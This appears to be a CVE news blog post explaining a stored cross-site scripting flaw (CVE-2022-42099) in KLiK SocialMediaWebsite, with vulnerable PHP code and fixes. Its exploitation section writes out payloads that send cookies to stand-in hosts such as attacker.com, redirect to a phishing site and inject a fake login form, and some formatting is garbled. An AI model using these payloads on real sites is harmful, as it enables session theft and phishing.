CVE CyberSecurity Database News

CVE-2022-42099 - How a Simple XSS Vulnerability in KLiK SocialMediaWebsite v1..1 Could Hijack User Sessions

Poster -

In late 2022, a critical security vulnerability—tracked as CVE-2022-42099—was discovered in KLiK SocialMediaWebsite Version 1..1, a web-based social network platform. The flaw allows attackers to inject malicious scripts via the “Forum Subject” input, which the application fails to sanitize. This Cross-Site Scripting (XSS) vulnerability can be exploited to steal cookies, hijack sessions, or perform actions as another user.

This post explores how the vulnerability works, how to exploit it (with code samples), and most importantly, how you can protect yourself and your platform.

What is KLiK SocialMediaWebsite?

KLiK SocialMediaWebsite is an open-source PHP project for creating a simple community-driven social site. Like many social platforms, it allows users to register, create forums, write posts, and interact with each other. The vulnerability exists in version 1..1, affecting installations where user input is not properly sanitized.

What is Stored XSS?

Stored Cross-Site Scripting (XSS) happens when a web application saves user-provided data (like a forum post or comment) to the database and later displays it to other users—in this case, without sanitizing it. When an attacker manages to inject a JavaScript payload into the “forum subject” field, anyone who views the forum list or the particular post is at risk—their browser executes the malicious code behind the scenes.

CVE Reference

- NVD - CVE-2022-42099

Suppose you have a typical form in KLiK SocialMediaWebsite for starting a new forum topic

<!-- forum_add.php -->
<form method="POST" action="forum_add.php">
    Forum Subject: <input type="text" name="subject">
    Forum Body: <textarea name="body"></textarea>
    <input type="submit" value="Submit">
</form>

In the backend, subject and body are written directly into the database

// forum_add.php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $subject = $_POST['subject'];
    $body = $_POST['body'];
    // This line is unsafe!
    // $db->query("INSERT INTO forums (subject, body) VALUES ('$subject', '$body')");
}

Later, the subject is displayed in the forum list without sanitizing

// forum_list.php
while($row = $result->fetch_assoc()) {
    echo '<tr><td>' . $row['subject'] . '</td><td>' . $row['author'] . '</td></tr>';
}

Problem: If an attacker submits <script>alert('XSS')</script> as their forum subject, every user who views the forum list will trigger the JavaScript instead of seeing just text.

Submit the following as the forum subject

"><script>fetch('https://attacker.com/stealcookie?c='+document.cookie)</script>

Step 2: The payload is stored in the database.

Step 3: Any user viewing the forum list will trigger the payload, sending their cookies to the attacker's server.

`html

fetch('<a href="https://evil.site/c?'+document.cookie" rel="nofollow">https://evil.site/c?'+document.cookie</a>)

- Redirect user:

html
window.location='<a href="https://phishing.site/login" rel="nofollow">https://phishing.site/login</a>'

- Show a fake login:

html
document.body.innerHTML='<h2>Session expired, please login again.</h2><form action="<a href="https://phishing.site/login" rel="nofollow">https://phishing.site/login</a>"><input name="user"></form>'


---

## How to Fix This Vulnerability

Mitigation Step 1: Sanitize Output

In PHP, always output user data using htmlspecialcharacters:

php
// Safe output
echo '' . htmlspecialchars($row['subject'], ENT_QUOTES, 'UTF-8') . '';


Mitigation Step 2: Validate and Sanitize Input

Reject malicious input, or strip tags:

php
$subject = strip_tags($_POST['subject']);
`

Mitigation Step 3: Apply a Web Application Firewall (WAF)

A WAF can catch and block suspicious input.

---

## References and Further Reading

- CVE-2022-42099 on NVD
- OWASP: Cross Site Scripting (XSS)
- KLiK SocialMediaWebsite Download and Demo
- How to Prevent XSS in PHP

---

## Conclusion

CVE-2022-42099 is a classic example of how even popular PHP web apps can fall victim to Cross-Site Scripting attacks through basic input/output mistakes. If you’re running KLiK SocialMediaWebsite version 1..1 (or any other PHP app), make sure to escape user data both on input and output. Patch your applications, and don’t assume user input is ever safe!

Stay safe, and always sanitize!

---

*Content exclusive for Stack*.

Timeline

Published on: 11/29/2022 04:15:00 UTC
Last modified on: 11/30/2022 04:59:00 UTC